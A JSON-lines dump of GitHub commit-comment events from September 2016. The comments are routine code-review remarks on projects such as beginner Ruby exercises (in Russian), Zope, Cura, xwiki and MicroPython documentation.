{"id":"4520283293","type":"CommitCommentEvent","actor":{"login":"vkurennov"},"repo":{"name":"nastylia/ror_beginner_exercises"},"payload":{"comment":{"id":18908364,"position":17,"line":17,"path":"lesson9/acessors.rb","commit_id":"4bef857bc276179653ec23f18d6879c545e4ae52","created_at":"2016-09-06T09:45:13Z","updated_at":"2016-09-06T09:45:13Z","body":"Тут есть проблема, когда ты будешь использовать этот метод дальше, в 21-й строке, то в первый раз у тебя вернется пустой массив, ты туда добавишь значение. Но этот массив `не сохранится` в инстанс-переменной. И в следующий раз, когда ты снова будешь устанавливать значение, у тебя этот метод вновь вернет пустой массив, т.к. переменная history_name по-прежнему пустая. Т.е. история не будет сохраняться. \r\nНужно сделать так: вернуть значение переменной history_name или, если там nil, сначала присвоить ей пустой массив и потом ее вернуть"}},"created_at":"2016-09-06T09:45:13Z"}
{"id":"4520284151","type":"CommitCommentEvent","actor":{"login":"asmagill"},"repo":{"name":"Hammerspoon/hammerspoon"},"payload":{"comment":{"id":18908366,"position":4,"line":988,"path":"extensions/screen/internal.m","commit_id":"45db095b53a0f2fcbf23af1f2b13517901225177","created_at":"2016-09-06T09:45:22Z","updated_at":"2016-09-06T09:45:22Z","body":"typo in documentation"}},"created_at":"2016-09-06T09:45:22Z"}
{"id":"4520285927","type":"CommitCommentEvent","actor":{"login":"hannosch"},"repo":{"name":"zopefoundation/ZServer"},"payload":{"comment":{"id":18908372,"position":13,"line":111,"path":"src/Products/SiteAccess/VirtualHostMonster.py","commit_id":"1d68460a6468ac55ab932b8b89aef31b1d445852","created_at":"2016-09-06T09:45:42Z","updated_at":"2016-09-06T09:45:42Z","body":"Oh and I of course also changed the ZServer based Publish method accordingly in https://github.com/zopefoundation/ZServer/blob/master/src/ZServer/ZPublisher/Publish.py#L144"}},"created_at":"2016-09-06T09:45:42Z"}
{"id":"4520286452","type":"CommitCommentEvent","actor":{"login":"encukou"},"repo":{"name":"frenzymadness/content"},"payload":{"comment":{"id":18908373,"position":82,"line":82,"path":"tech/languages/python/micropython.md","commit_id":"6dbd8448556eff0626c1ba39590cb76e141c73e9","created_at":"2016-09-06T09:45:49Z","updated_at":"2016-09-06T09:45:49Z","body":"Before using Picocom, you need to flash the MicroPython firmware onto the device. Unfortunately `esptool` is not yet packaged for Fedora. And you also need the [MicroPython firmware](http://micropython.org/download/#esp8266)."}},"created_at":"2016-09-06T09:45:49Z"}
{"id":"4520287291","type":"CommitCommentEvent","actor":{"login":"gdelhumeau"},"repo":{"name":"xwiki/xwiki-commons"},"payload":{"comment":{"id":18908374,"position":39,"line":108,"path":"xwiki-commons-tools/xwiki-commons-tool-enforcers/xwiki-commons-tool-enforcer-dependencies/src/main/java/org/xwiki/tool/enforcer/ExternalExtensionCheck.java","commit_id":"bb02da7d7d96bf17045bd34eee6736a7279c9ed9","created_at":"2016-09-06T09:46:00Z","updated_at":"2016-09-06T09:46:00Z","body":"Ok I think I've understood why. This commit seems to not have been backported to 7.4.4."}},"created_at":"2016-09-06T09:46:00Z"}
{"id":"4520289680","type":"CommitCommentEvent","actor":{"login":"vkurennov"},"repo":{"name":"nastylia/ror_beginner_exercises"},"payload":{"comment":{"id":18908377,"position":48,"line":48,"path":"lesson9/validation.rb","commit_id":"4bef857bc276179653ec23f18d6879c545e4ae52","created_at":"2016-09-06T09:46:30Z","updated_at":"2016-09-06T09:46:30Z","body":"Обычно, сначала пишут модуль ClassMethods, потом InstanceMethods"}},"created_at":"2016-09-06T09:46:30Z"}
{"id":"4520289781","type":"CommitCommentEvent","actor":{"login":"jumjum888"},"repo":{"name":"ajtowns/snarkfront"},"payload":{"comment":{"id":18908378,"position":null,"line":null,"path":null,"commit_id":"07780fa46e807425608141e71fd1538d2d379307","created_at":"2016-09-06T09:46:32Z","updated_at":"2016-09-06T09:46:32Z","body":"07780fa"}},"created_at":"2016-09-06T09:46:32Z"}
{"id":"4520289999","type":"CommitCommentEvent","actor":{"login":"mwiget"},"repo":{"name":"Igalia/snabb"},"payload":{"comment":{"id":18908379,"position":null,"line":null,"path":null,"commit_id":"46c8ca2830bdd17002789013bdcf768b8879d86e","created_at":"2016-09-06T09:46:35Z","updated_at":"2016-09-06T09:46:35Z","body":"Hmm, that option is confusing. The README indicates action 'flush' as an option for --ingress-packet-monitor, but then it looks to be more of a on/off thing (set to 1). I prefer this to be default to be enabled and triggering flush(). \r\nIMHO config of this option could be done via discard_threshold <number-of-packets-lost> in the config file for snabbvmx: https://github.com/Igalia/snabb/tree/lwaftr/src/program/snabbvmx/lwaftr (settings {}).\r\nThoughts?"}},"created_at":"2016-09-06T09:46:35Z"}
{"id":"4520290298","type":"CommitCommentEvent","actor":{"login":"lintr-bot"},"repo":{"name":"richelbilderbeek/Cer2016"},"payload":{"comment":{"id":18908381,"position":null,"line":null,"path":null,"commit_id":"0a40c4b8f7c64767f08bc56f3f3a92d11a9f3615","created_at":"2016-09-06T09:46:38Z","updated_at":"2016-09-06T09:46:38Z","body":"[R/read_collected_parameters.R:16:27:](https://github.com/richelbilderbeek/Cer2016/blob/0a40c4b8f7c64767f08bc56f3f3a92d11a9f3615/R/read_collected_parameters.R#L16) *style:* **Commas should always have a space after.**\n```r\n​    df <- plyr::rename(df,c('mcmc_chainlength'='nspp'))\n                          ^\n```\n[R/read_collected_parameters.R:16:29:](https://github.com/richelbilderbeek/Cer2016/blob/0a40c4b8f7c64767f08bc56f3f3a92d11a9f3615/R/read_collected_parameters.R#L16) *style:* **Only use double-quotes.**\n```r\n​    df <- plyr::rename(df,c('mcmc_chainlength'='nspp'))\n                            ^~~~~~~~~~~~~~~~~~\n```\n[R/read_collected_parameters.R:16:47:](https://github.com/richelbilderbeek/Cer2016/blob/0a40c4b8f7c64767f08bc56f3f3a92d11a9f3615/R/read_collected_parameters.R#L16) *style:* **Put spaces around all infix operators.**\n```r\n​    df <- plyr::rename(df,c('mcmc_chainlength'='nspp'))\n                                             ~^~\n```\n[R/read_collected_parameters.R:16:48:](https://github.com/richelbilderbeek/Cer2016/blob/0a40c4b8f7c64767f08bc56f3f3a92d11a9f3615/R/read_collected_parameters.R#L16) *style:* **Only use double-quotes.**\n```r\n​    df <- plyr::rename(df,c('mcmc_chainlength'='nspp'))\n                                               ^~~~~~\n```"}},"created_at":"2016-09-06T09:46:38Z"}
{"id":"4520290529","type":"CommitCommentEvent","actor":{"login":"coolo"},"repo":{"name":"os-autoinst/os-autoinst"},"payload":{"comment":{"id":18908382,"position":null,"line":null,"path":null,"commit_id":"41ebf9fb4198d021f3710be7e58aea3df448c0a2","created_at":"2016-09-06T09:46:41Z","updated_at":"2016-09-06T09:46:41Z","body":"ok, the warning is harmless. The warning is just about check-screen returning undef."}},"created_at":"2016-09-06T09:46:41Z"}
{"id":"4520291050","type":"CommitCommentEvent","actor":{"login":"vkurennov"},"repo":{"name":"nastylia/ror_beginner_exercises"},"payload":{"comment":{"id":18908384,"position":54,"line":54,"path":"lesson9/validation.rb","commit_id":"4bef857bc276179653ec23f18d6879c545e4ae52","created_at":"2016-09-06T09:46:48Z","updated_at":"2016-09-06T09:46:48Z","body":"Это зачем?"}},"created_at":"2016-09-06T09:46:48Z"}
{"id":"4520294625","type":"CommitCommentEvent","actor":{"login":"jumjum888"},"repo":{"name":"ajtowns/snarkfront"},"payload":{"comment":{"id":18908388,"position":null,"line":null,"path":null,"commit_id":"83d649fedf0d307eab4e110aa88ec163cfb122ae","created_at":"2016-09-06T09:47:34Z","updated_at":"2016-09-06T09:47:34Z","body":"83d649f"}},"created_at":"2016-09-06T09:47:34Z"}
{"id":"4520295761","type":"CommitCommentEvent","actor":{"login":"wangan88"},"repo":{"name":"salmar/spring-websocket-chat"},"payload":{"comment":{"id":18908391,"position":13,"line":60,"path":"src/main/java/com/sergialmar/wschat/web/ChatController.java","commit_id":"06a0eeb12b4f193f2531b620b8d40a5876370ff9","created_at":"2016-09-06T09:47:47Z","updated_at":"2016-09-06T09:47:47Z","body":"ss"}},"created_at":"2016-09-06T09:47:47Z"}
{"id":"4520296523","type":"CommitCommentEvent","actor":{"login":"gdelhumeau"},"repo":{"name":"xwiki/xwiki-commons"},"payload":{"comment":{"id":18908392,"position":39,"line":108,"path":"xwiki-commons-tools/xwiki-commons-tool-enforcers/xwiki-commons-tool-enforcer-dependencies/src/main/java/org/xwiki/tool/enforcer/ExternalExtensionCheck.java","commit_id":"bb02da7d7d96bf17045bd34eee6736a7279c9ed9","created_at":"2016-09-06T09:47:57Z","updated_at":"2016-09-06T09:47:57Z","body":"I was right. See: https://github.com/xwiki/xwiki-commons/blob/xwiki-commons-7.4.4/xwiki-commons-tools/xwiki-commons-tool-enforcers/xwiki-commons-tool-enforcer-dependencies/src/main/java/org/xwiki/tool/enforcer/ExternalExtensionCheck.java#L109\r\n\r\nToo bad it was not backported!"}},"created_at":"2016-09-06T09:47:57Z"}
{"id":"4520296995","type":"CommitCommentEvent","actor":{"login":"vkurennov"},"repo":{"name":"nastylia/ror_beginner_exercises"},"payload":{"comment":{"id":18908393,"position":27,"line":27,"path":"lesson9/validation.rb","commit_id":"4bef857bc276179653ec23f18d6879c545e4ae52","created_at":"2016-09-06T09:48:02Z","updated_at":"2016-09-06T09:48:02Z","body":"Ты в каждом методе получаешь значение переменной, а ведь можно его получить один раз в методу validate! и передавать уже значение, а не имя переменной."}},"created_at":"2016-09-06T09:48:02Z"}
{"id":"4520297188","type":"CommitCommentEvent","actor":{"login":"tmortagne"},"repo":{"name":"xwiki/xwiki-commons"},"payload":{"comment":{"id":18908395,"position":39,"line":108,"path":"xwiki-commons-tools/xwiki-commons-tool-enforcers/xwiki-commons-tool-enforcer-dependencies/src/main/java/org/xwiki/tool/enforcer/ExternalExtensionCheck.java","commit_id":"bb02da7d7d96bf17045bd34eee6736a7279c9ed9","created_at":"2016-09-06T09:48:05Z","updated_at":"2016-09-06T09:48:05Z","body":"A pity the error does not print the group id it checked."}},"created_at":"2016-09-06T09:48:05Z"}
{"id":"4520297339","type":"CommitCommentEvent","actor":{"login":"Shnoulle"},"repo":{"name":"LimeSurvey/LimeSurvey"},"payload":{"comment":{"id":18908396,"position":5,"line":691,"path":"application/helpers/replacements_helper.php","commit_id":"b1c10d5d9f5f4f0e482c071bce787aee3864bdad","created_at":"2016-09-06T09:48:08Z","updated_at":"2016-09-06T09:48:08Z","body":"Validation (by EM) is done after submit, always in PHP, else it's not validation .....\r\n\r\nYou have an issue for single choice, but since a long time."}},"created_at":"2016-09-06T09:48:08Z"}
{"id":"4520300417","type":"CommitCommentEvent","actor":{"login":"asmagill"},"repo":{"name":"Hammerspoon/hammerspoon"},"payload":{"comment":{"id":18908400,"position":27,"line":1011,"path":"extensions/screen/internal.m","commit_id":"45db095b53a0f2fcbf23af1f2b13517901225177","created_at":"2016-09-06T09:48:45Z","updated_at":"2016-09-06T09:48:45Z","body":"is there a benefit gained by forcing the use of a file url in string format (e.g. \"file://......\") versus using `[NSURL fileURLWithPath:[url stringByExpandingTildeInPath]]`?   I can think of a few cases where internally generated file URL's don't match an actual path, but off the top of my head, not from something a user would type in, only as a return value from something else..."}},"created_at":"2016-09-06T09:48:45Z"}
{"id":"4520301165","type":"CommitCommentEvent","actor":{"login":"awhiemstra"},"repo":{"name":"Ultimaker/cura-build-environment"},"payload":{"comment":{"id":18908401,"position":20,"line":20,"path":"projects/numpy.cmake","commit_id":"5762b5ef54f2e6bba13cae99616ce1e29be57d65","created_at":"2016-09-06T09:48:56Z","updated_at":"2016-09-06T09:48:56Z","body":"Since this is not cryptography but just checksumming I see no real reason not to use MD5. Heck, CRC32 should probably be fine."}},"created_at":"2016-09-06T09:48:56Z"}
{"id":"4520301571","type":"CommitCommentEvent","actor":{"login":"hroncok"},"repo":{"name":"frenzymadness/content"},"payload":{"comment":{"id":18908402,"position":82,"line":82,"path":"tech/languages/python/micropython.md","commit_id":"6dbd8448556eff0626c1ba39590cb76e141c73e9","created_at":"2016-09-06T09:49:01Z","updated_at":"2016-09-06T09:49:01Z","body":"Let's package it?"}},"created_at":"2016-09-06T09:49:01Z"}
{"id":"4520301825","type":"CommitCommentEvent","actor":{"login":"EDiLD"},"repo":{"name":"gavinsimpson/fromthebottomoftheheap"},"payload":{"comment":{"id":18908404,"position":76,"line":76,"path":"_posts/2015-11-23-are-some-seasons-warming-more-than-others.Rmd","commit_id":"419921ed16e752158bca13f7acb9f325fb9b3902","created_at":"2016-09-06T09:49:04Z","updated_at":"2016-09-06T09:49:04Z","body":"Typo: second method should be `method = \"REML\"`"}},"created_at":"2016-09-06T09:49:04Z"}
{"id":"4520302236","type":"CommitCommentEvent","actor":{"login":"vkurennov"},"repo":{"name":"nastylia/ror_beginner_exercises"},"payload":{"comment":{"id":18908405,"position":13,"line":13,"path":"lesson9/validation.rb","commit_id":"4bef857bc276179653ec23f18d6879c545e4ae52","created_at":"2016-09-06T09:49:10Z","updated_at":"2016-09-06T09:49:10Z","body":"А each здесь ни к чему, т.к. элемент в хеше params всегда один. Можно у params взять первый элемент (это будет name) и все остальные со второго по последний (`param[1..-1]`)"}},"created_at":"2016-09-06T09:49:10Z"}
{"id":"4520302968","type":"CommitCommentEvent","actor":{"login":"gdelhumeau"},"repo":{"name":"xwiki/xwiki-commons"},"payload":{"comment":{"id":18908407,"position":39,"line":108,"path":"xwiki-commons-tools/xwiki-commons-tool-enforcers/xwiki-commons-tool-enforcer-dependencies/src/main/java/org/xwiki/tool/enforcer/ExternalExtensionCheck.java","commit_id":"bb02da7d7d96bf17045bd34eee6736a7279c9ed9","created_at":"2016-09-06T09:49:18Z","updated_at":"2016-09-06T09:49:18Z","body":"According to http://jira.xwiki.org/browse/XCOMMONS-1025, it was backported in 7.4.5 actually."}},"created_at":"2016-09-06T09:49:18Z"}
{"id":"4520306030","type":"CommitCommentEvent","actor":{"login":"jumjum888"},"repo":{"name":"jancarlsson/snarkfront"},"payload":{"comment":{"id":18908411,"position":null,"line":null,"path":null,"commit_id":"8951ebc5016c4ec3633f48109a81fbca85a5d77d","created_at":"2016-09-06T09:49:56Z","updated_at":"2016-09-06T09:49:56Z","body":"8951ebc"}},"created_at":"2016-09-06T09:49:56Z"}
{"id":"4520306569","type":"CommitCommentEvent","actor":{"login":"awhiemstra"},"repo":{"name":"Ultimaker/cura-build-environment"},"payload":{"comment":{"id":18908412,"position":9,"line":9,"path":"projects/arcus.cmake","commit_id":"5762b5ef54f2e6bba13cae99616ce1e29be57d65","created_at":"2016-09-06T09:50:03Z","updated_at":"2016-09-06T09:50:03Z","body":"Most of these missing hashes are due to upstream not providing any. We can probably generate our own but that feels a bit like a hack."}},"created_at":"2016-09-06T09:50:03Z"}
{"id":"4520307085","type":"CommitCommentEvent","actor":{"login":"theMiddleBlue"},"repo":{"name":"theMiddleBlue/BaTbot"},"payload":{"comment":{"id":18908416,"position":null,"line":null,"path":null,"commit_id":"3dfc3116cf25c339766dcbf76b9d98d78d0d3243","created_at":"2016-09-06T09:50:11Z","updated_at":"2016-09-06T09:50:11Z","body":"Thank you, I've missed it. Now, if you clone the actual version, it should works:\r\n\r\n<img width=\"789\" alt=\"schermata 2016-09-06 alle 11 47 45\" src=\"https://cloud.githubusercontent.com/assets/4454961/18269310/edbbac12-7427-11e6-9f2d-d0c0c7140d16.png\">\r\n\r\n"}},"created_at":"2016-09-06T09:50:11Z"}
{"id":"4520308402","type":"CommitCommentEvent","actor":{"login":"cursey"},"repo":{"name":"cursey/kanan"},"payload":{"comment":{"id":18908418,"position":null,"line":null,"path":null,"commit_id":"7118b066fbfd5fc5beab8d39ecbaa0c4f5d7ae27","created_at":"2016-09-06T09:50:26Z","updated_at":"2016-09-06T09:50:26Z","body":"It should have outputted additional messages when you join the game/change channels. Did it not?"}},"created_at":"2016-09-06T09:50:26Z"}
{"id":"4520308481","type":"CommitCommentEvent","actor":{"login":"jumjum888"},"repo":{"name":"jancarlsson/snarkfront"},"payload":{"comment":{"id":18908419,"position":null,"line":null,"path":null,"commit_id":"7f90a4181721f758f114497382aa462185e71dae","created_at":"2016-09-06T09:50:27Z","updated_at":"2016-09-06T09:50:27Z","body":"7f90a41"}},"created_at":"2016-09-06T09:50:27Z"}
{"id":"4520309059","type":"CommitCommentEvent","actor":{"login":"vkurennov"},"repo":{"name":"nastylia/ror_beginner_exercises"},"payload":{"comment":{"id":18908421,"position":53,"line":53,"path":"lesson9/validation.rb","commit_id":"4bef857bc276179653ec23f18d6879c545e4ae52","created_at":"2016-09-06T09:50:34Z","updated_at":"2016-09-06T09:50:34Z","body":"У тебя будут перезаписываться валидации. Например, объявляешь ты такие валидации:\r\n\r\n```\r\nvalidate :name, :presence\r\nvalidate :name, :format, NAME_FORMAT\r\n```\r\n\r\nУ тебя будет работать только format, т.к. он перезапишет валидацию name. А нужно, чтобы работали все валидации. Для этого нужно значения помещать в массив, т.е. будет массив хешей."}},"created_at":"2016-09-06T09:50:34Z"}
{"id":"4520309831","type":"CommitCommentEvent","actor":{"login":"Uppermost"},"repo":{"name":"OpenNos/OpenNos"},"payload":{"comment":{"id":18908423,"position":null,"line":null,"path":null,"commit_id":"7f952c62f9eb8b97865ca325c5502f533665884a","created_at":"2016-09-06T09:50:43Z","updated_at":"2016-09-06T09:50:43Z","body":"Need to see why it doesn't work now eg. speaker"}},"created_at":"2016-09-06T09:50:43Z"}
{"id":"4520310311","type":"CommitCommentEvent","actor":{"login":"luWenFengGitHub"},"repo":{"name":"luWenFengGitHub/qqtest"},"payload":{"comment":{"id":18908425,"position":null,"line":null,"path":null,"commit_id":"04da9ac24c57c7284a5c27a68abfb05388a9b9be","created_at":"2016-09-06T09:50:49Z","updated_at":"2016-09-06T09:50:49Z","body":"代码调整????"}},"created_at":"2016-09-06T09:50:49Z"}
{"id":"4520310577","type":"CommitCommentEvent","actor":{"login":"frenzymadness"},"repo":{"name":"frenzymadness/content"},"payload":{"comment":{"id":18908427,"position":82,"line":82,"path":"tech/languages/python/micropython.md","commit_id":"6dbd8448556eff0626c1ba39590cb76e141c73e9","created_at":"2016-09-06T09:50:52Z","updated_at":"2016-09-06T09:50:52Z","body":"I am gonna look on it."}},"created_at":"2016-09-06T09:50:52Z"}
{"id":"4520312299","type":"CommitCommentEvent","actor":{"login":"jumjum888"},"repo":{"name":"jancarlsson/snarkfront"},"payload":{"comment":{"id":18908433,"position":null,"line":null,"path":null,"commit_id":"8f90850b4391c450f0781712de551b640a105f1f","created_at":"2016-09-06T09:51:14Z","updated_at":"2016-09-06T09:51:14Z","body":"8f90850"}},"created_at":"2016-09-06T09:51:14Z"}
{"id":"4520315790","type":"CommitCommentEvent","actor":{"login":"hughperkins"},"repo":{"name":"jaredo/jeigen"},"payload":{"comment":{"id":18908438,"position":null,"line":null,"path":null,"commit_id":"88df1ef86adc2f4323c0fd970f84ceb8d1f79d41","created_at":"2016-09-06T09:51:57Z","updated_at":"2016-09-06T09:51:57Z","body":"Thanks!\n\nOn September 6, 2016 10:42:23 AM GMT+01:00, jaredo <notifications@github.com> wrote:\n>Good point! Done.\n>\n>-- \n>You are receiving this because you commented.\n>Reply to this email directly or view it on GitHub:\n>https://github.com/jaredo/jeigen/commit/88df1ef86adc2f4323c0fd970f84ceb8d1f79d41#commitcomment-18908336\n\n-- \nSent from my Android device with K-9 Mail. Please excuse my brevity."}},"created_at":"2016-09-06T09:51:57Z"}
{"id":"4520316425","type":"CommitCommentEvent","actor":{"login":"hroncok"},"repo":{"name":"frenzymadness/content"},"payload":{"comment":{"id":18908439,"position":82,"line":82,"path":"tech/languages/python/micropython.md","commit_id":"6dbd8448556eff0626c1ba39590cb76e141c73e9","created_at":"2016-09-06T09:52:06Z","updated_at":"2016-09-06T09:52:06Z","body":"already running pyp2rpm :) you cen do the review"}},"created_at":"2016-09-06T09:52:06Z"}
{"id":"4520317737","type":"CommitCommentEvent","actor":{"login":"jumjum888"},"repo":{"name":"jancarlsson/snarkfront"},"payload":{"comment":{"id":18908441,"position":null,"line":null,"path":null,"commit_id":"5ecab1c3f50ef6ab0104cb8d81634a341d5f8c29","created_at":"2016-09-06T09:52:21Z","updated_at":"2016-09-06T09:52:21Z","body":"5ecab1c"}},"created_at":"2016-09-06T09:52:21Z"}
{"id":"4520320296","type":"CommitCommentEvent","actor":{"login":"hannosch"},"repo":{"name":"zopefoundation/Zope"},"payload":{"comment":{"id":18908445,"position":4,"line":34,"path":"CHANGES.rst","commit_id":"4b3b028139a84be7489ff34c91ecd14a99124c01","created_at":"2016-09-06T09:52:51Z","updated_at":"2016-09-06T09:52:51Z","body":"The support for transaction retry (for ZODB ConflictError/transaction TransientError) is built into the publisher again. This means the ZPublisher.pubevents can be properly supported again and exception handling can be integrated back into the publisher (where it can for example turn a 500 exception into a nicely rendered HTML response object and we can still abort the transaction beforehand).\r\n\r\nMy main goal here was to make the WSGI and non-WSGI publisher much more similar again, instead of the repoze/middleware approach we had in 2.13. This is all based on the assumption that few people actually made use of the additional middleware approach. If that isn't true, we can put two WSGI publisher into Zope 4, one repoze based, one based on my new code."}},"created_at":"2016-09-06T09:52:51Z"}
{"id":"4520320449","type":"CommitCommentEvent","actor":{"login":"hroncok"},"repo":{"name":"frenzymadness/content"},"payload":{"comment":{"id":18908447,"position":82,"line":82,"path":"tech/languages/python/micropython.md","commit_id":"6dbd8448556eff0626c1ba39590cb76e141c73e9","created_at":"2016-09-06T09:52:53Z","updated_at":"2016-09-06T09:52:53Z","body":"RuntimeError: esptool.py only supports Python 2.x :("}},"created_at":"2016-09-06T09:52:53Z"}
{"id":"4520320718","type":"CommitCommentEvent","actor":{"login":"jumjum888"},"repo":{"name":"jancarlsson/snarkfront"},"payload":{"comment":{"id":18908448,"position":null,"line":null,"path":null,"commit_id":"232c39319bd42698570046a6800046b1325658f7","created_at":"2016-09-06T09:52:56Z","updated_at":"2016-09-06T09:52:56Z","body":"232c393"}},"created_at":"2016-09-06T09:52:56Z"}
{"id":"4520321088","type":"CommitCommentEvent","actor":{"login":"frenzymadness"},"repo":{"name":"frenzymadness/content"},"payload":{"comment":{"id":18908452,"position":82,"line":82,"path":"tech/languages/python/micropython.md","commit_id":"6dbd8448556eff0626c1ba39590cb76e141c73e9","created_at":"2016-09-06T09:53:01Z","updated_at":"2016-09-06T09:53:01Z","body":"Deal :+1: "}},"created_at":"2016-09-06T09:53:01Z"}
{"id":"4520325903","type":"CommitCommentEvent","actor":{"login":"frenzymadness"},"repo":{"name":"frenzymadness/content"},"payload":{"comment":{"id":18908466,"position":82,"line":82,"path":"tech/languages/python/micropython.md","commit_id":"6dbd8448556eff0626c1ba39590cb76e141c73e9","created_at":"2016-09-06T09:54:04Z","updated_at":"2016-09-06T09:54:04Z","body":"Port it? :smile: "}},"created_at":"2016-09-06T09:54:04Z"}
{"id":"4520327455","type":"CommitCommentEvent","actor":{"login":"LouisGac"},"repo":{"name":"LimeSurvey/LimeSurvey"},"payload":{"comment":{"id":18908471,"position":5,"line":691,"path":"application/helpers/replacements_helper.php","commit_id":"b1c10d5d9f5f4f0e482c071bce787aee3864bdad","created_at":"2016-09-06T09:54:24Z","updated_at":"2016-09-06T09:54:24Z","body":"Great to hear: I thought some validations were still not done at PHP level. "}},"created_at":"2016-09-06T09:54:24Z"}
{"id":"4520328154","type":"CommitCommentEvent","actor":{"login":"vkurennov"},"repo":{"name":"foxy-eyed/railway"},"payload":{"comment":{"id":18908472,"position":2,"line":2,"path":"app/models/railway_station.rb","commit_id":"9ae46875eefcefd7dacd3104453ef3e15b180f10","created_at":"2016-09-06T09:54:33Z","updated_at":"2016-09-06T09:54:33Z","body":"В моделях принято писать сначала ассоциации, потом валидации, придерживайся такого же порядка."}},"created_at":"2016-09-06T09:54:33Z"}
{"id":"4520330008","type":"CommitCommentEvent","actor":{"login":"romainreuillon"},"repo":{"name":"openmole/openmole"},"payload":{"comment":{"id":18908475,"position":6,"line":77,"path":"openmole/project/src/main/scala/root/Bin.scala","commit_id":"c9548c63c3e77798e9bd124d7f7561daa7361343","created_at":"2016-09-06T09:54:55Z","updated_at":"2016-09-06T09:54:55Z","body":"Not sure why this would be necessary. The others are caches so it make sens to clean them. This one is a simple sbt project which recompiles when the source code changes."}},"created_at":"2016-09-06T09:54:55Z"}
{"id":"4520330931","type":"CommitCommentEvent","actor":{"login":"fredrikmoller"},"repo":{"name":"SystemaAS/espedsg"},"payload":{"comment":{"id":18908478,"position":null,"line":null,"path":null,"commit_id":"52e70c0f931399c51f3d9b7d9654d7b732c80728","created_at":"2016-09-06T09:55:08Z","updated_at":"2016-09-06T09:55:08Z","body":"@oscarsystema \r\n\r\nKolla denna, vet inte varför det blir så här. Gör commit och push, denna merge sker magiskt..."}},"created_at":"2016-09-06T09:55:08Z"}
{"id":"4520333834","type":"CommitCommentEvent","actor":{"login":"blueweather"},"repo":{"name":"jushenziao/LauncherDemo"},"payload":{"comment":{"id":18908482,"position":5,"line":78,"path":"launcher3/src/main/java/com/vdroid/launcher3/AutoInstallsLayout.java","commit_id":"34b8281d725d2ad611314d76090f16c5182b62fd","created_at":"2016-09-06T09:55:43Z","updated_at":"2016-09-06T09:55:43Z","body":"这种空格就不用提交了吧"}},"created_at":"2016-09-06T09:55:43Z"}
{"id":"4520334095","type":"CommitCommentEvent","actor":{"login":"vkurennov"},"repo":{"name":"foxy-eyed/railway"},"payload":{"comment":{"id":18908483,"position":7,"line":7,"path":"app/models/railway_station.rb","commit_id":"9ae46875eefcefd7dacd3104453ef3e15b180f10","created_at":"2016-09-06T09:55:46Z","updated_at":"2016-09-06T09:55:46Z","body":"Хорошо бы добавить ассоциации на билеты, чтобы можно было выбирать билеты, проданные на эту станцию"}},"created_at":"2016-09-06T09:55:46Z"}
{"id":"4520335459","type":"CommitCommentEvent","actor":{"login":"shanx"},"repo":{"name":"pydanny/cookiecutter-django"},"payload":{"comment":{"id":18908487,"position":null,"line":null,"path":null,"commit_id":"c5e984cf2365dba59061b930fe5fa14571c25659","created_at":"2016-09-06T09:56:03Z","updated_at":"2016-09-06T09:56:03Z","body":"should this not be the license for cookiecutter-django itself instead of a template?"}},"created_at":"2016-09-06T09:56:03Z"}
{"id":"4520338943","type":"CommitCommentEvent","actor":{"login":"danhalliday"},"repo":{"name":"web-workshop-ltd/landing-page-1G"},"payload":{"comment":{"id":18908494,"position":4,"line":13,"path":"site/index.html","commit_id":"90e2e098140be2a1ec563cfd40cfe80a73b4904c","created_at":"2016-09-06T09:56:46Z","updated_at":"2016-09-06T09:56:46Z","body":"Don't rely on Github hosting this file for you — try a relative link to the file in the repository."}},"created_at":"2016-09-06T09:56:46Z"}
{"id":"4520340490","type":"CommitCommentEvent","actor":{"login":"Ghostkeeper"},"repo":{"name":"Ultimaker/Cura"},"payload":{"comment":{"id":18908498,"position":34,"line":108,"path":"cura/PlatformPhysics.py","commit_id":"4817dbe62ffef1b4ee9cc3e950e63be04e27be94","created_at":"2016-09-06T09:57:05Z","updated_at":"2016-09-06T09:57:05Z","body":"Nothing, really. I think it's a bit more clear than to have a counter to manually increment. But I suppose it's subjective."}},"created_at":"2016-09-06T09:57:05Z"}
{"id":"4520341260","type":"CommitCommentEvent","actor":{"login":"mibamur"},"repo":{"name":"donperi/cached_counts"},"payload":{"comment":{"id":18908501,"position":null,"line":null,"path":null,"commit_id":"ceb48c2604e0fbb28a29ddec407300555b0094d8","created_at":"2016-09-06T09:57:16Z","updated_at":"2016-09-06T09:57:16Z","body":"whats wrong with it`30.minutes`?"}},"created_at":"2016-09-06T09:57:16Z"}
{"id":"4520344539","type":"CommitCommentEvent","actor":{"login":"thopiekar"},"repo":{"name":"Ultimaker/Uranium"},"payload":{"comment":{"id":18908507,"position":null,"line":null,"path":null,"commit_id":"cff519a897611b7b578d260af50e7b46d8434262","created_at":"2016-09-06T09:57:55Z","updated_at":"2016-09-06T09:57:55Z","body":"@Ghostkeeper: From JIRA:\r\n```@sedwards2009 added a comment - Yesterday\r\n@thopiekar When you are ready you can merge this into master yourself.\r\n```"}},"created_at":"2016-09-06T09:57:55Z"}
{"id":"4520344637","type":"CommitCommentEvent","actor":{"login":"SaraZamillo"},"repo":{"name":"SaraZamillo/prova"},"payload":{"comment":{"id":18908509,"position":null,"line":null,"path":null,"commit_id":"d8640939edcea49af3b514324d8ef2cebb7802c0","created_at":"2016-09-06T09:57:57Z","updated_at":"2016-09-06T09:57:57Z","body":"Manca da capire come si organizzano i file in cartelle."}},"created_at":"2016-09-06T09:57:57Z"}
{"id":"4520345085","type":"CommitCommentEvent","actor":{"login":"awhiemstra"},"repo":{"name":"Ultimaker/cura-build-environment"},"payload":{"comment":{"id":18908512,"position":null,"line":null,"path":null,"commit_id":"b3f607db930864e8ee35a990efd8b3b6c27f6313","created_at":"2016-09-06T09:58:03Z","updated_at":"2016-09-06T09:58:03Z","body":"Oh hah, you are way faster at this. Also, this was one of the reasons for wanting to switch to cx_Freeze: It is very actively maintained. :)"}},"created_at":"2016-09-06T09:58:03Z"}
{"id":"4520345821","type":"CommitCommentEvent","actor":{"login":"Ghostkeeper"},"repo":{"name":"Ultimaker/Cura"},"payload":{"comment":{"id":18908516,"position":31,"line":105,"path":"cura/PlatformPhysics.py","commit_id":"4817dbe62ffef1b4ee9cc3e950e63be04e27be94","created_at":"2016-09-06T09:58:11Z","updated_at":"2016-09-06T09:58:11Z","body":"No need to calculate `overlap[0] * self._move_factor` and `overlap[1] * self._move_factor` then."}},"created_at":"2016-09-06T09:58:11Z"}
